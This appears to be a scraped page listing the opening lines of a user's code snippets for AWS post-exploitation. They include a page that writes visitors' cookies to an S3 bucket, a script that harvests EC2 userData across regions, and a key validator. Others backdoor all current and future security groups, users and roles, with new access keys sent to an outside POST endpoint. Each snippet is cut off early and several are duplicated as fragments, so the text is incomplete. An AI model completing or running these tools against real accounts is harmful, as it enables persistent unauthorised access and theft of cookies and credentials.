Daniel Grzelak dagrz

## Write cookies to s3 bucket
<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
</head>
<body>
  <script>
   $(document).ready(function(){
    $.ajax({
        type: 'PUT',
        headers: {'x-amz-acl': 'bucket-owner-full-control'},

## Retrieve all EC2 instance userData
#!/usr/bin/env python
from __future__ import print_function
import boto3
import base64

client = boto3.client(service_name='ec2', region_name='us-east-1')
for region in client.describe_regions()['Regions']:
    ec2 = boto3.resource(service_name='ec2', region_name=region['RegionName'])
    for instance in ec2.instances.all():
        response = instance.describe_attribute(Attribute='userData')

## Validate access keys
#!/usr/bin/env python
from __future__ import print_function
import boto3
from botocore.exceptions import ClientError
import json
import argparse


def main(args):
    for line in args.key_file.readlines():

## Backdoor future security groups in AWS account
#!/usr/bin/env python
from __future__ import print_function
import json
import boto3
import random

# A list of rules to add at random to security groups.
BACKDOOR_RULES = [
    { 'FromPort': 0, 'ToPort': 65535, 'CidrIp': '127.0.0.1/32', 'IpProtocol': '-1'}
]

## Backdoor future roles in AWS account
#!/usr/bin/env python
from __future__ import print_function
import json
import boto3
from botocore.exceptions import ClientError
import requests
import random

# An endpoint to send access keys to, e.g. http://requestb.in/
POST_URL = 'https://...'

## Backdoor future users in AWS account
#!/usr/bin/env python
from __future__ import print_function
import json
import boto3
from botocore.exceptions import ClientError
import requests

# An endpoint to send access keys to, e.g. http://requestb.in/
POST_URL = 'https://...'

## AWS Lambda user rabbit
#!/usr/bin/env python

from __future__ import print_function
import json
import boto3
import random
import re
import string

def lambda_handler(event, context):

## Backdoor all security groups in AWS account
#!/usr/bin/env python
from __future__ import print_function
import boto3
from botocore.exceptions import ClientError
import json
import random


# A list of rules to add at random to security groups.
BACKDOOR_RULES = [

## Backdoor all users in AWS account
#!/usr/bin/env python
from __future__ import print_function
import boto3
from botocore.exceptions import ClientError
import json


def main(args):
    backdoor_users(get_users())

## AWS cli proxy Lambda function
#!/usr/bin/env python

from __future__ import print_function
import awscli
import awscli.clidriver
from cStringIO import StringIO
import sys
import json
	<html>
	<head>
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
	</head>
	<body>
	<script>
	$(document).ready(function(){
	$.ajax({
	type: 'PUT',
	headers: {'x-amz-acl': 'bucket-owner-full-control'},
	#!/usr/bin/env python
	from __future__ import print_function
	import boto3
	import base64

	client = boto3.client(service_name='ec2', region_name='us-east-1')
	for region in client.describe_regions()['Regions']:
	ec2 = boto3.resource(service_name='ec2', region_name=region['RegionName'])
	for instance in ec2.instances.all():
	response = instance.describe_attribute(Attribute='userData')
	#!/usr/bin/env python
	from __future__ import print_function
	import json
	import boto3
	import random

	# A list of rules to add at random to security groups.
	BACKDOOR_RULES = [
	{ 'FromPort': 0, 'ToPort': 65535, 'CidrIp': '127.0.0.1/32', 'IpProtocol': '-1'}
	]
	#!/usr/bin/env python

	from __future__ import print_function
	import awscli
	import awscli.clidriver
	from cStringIO import StringIO
	import sys
	import json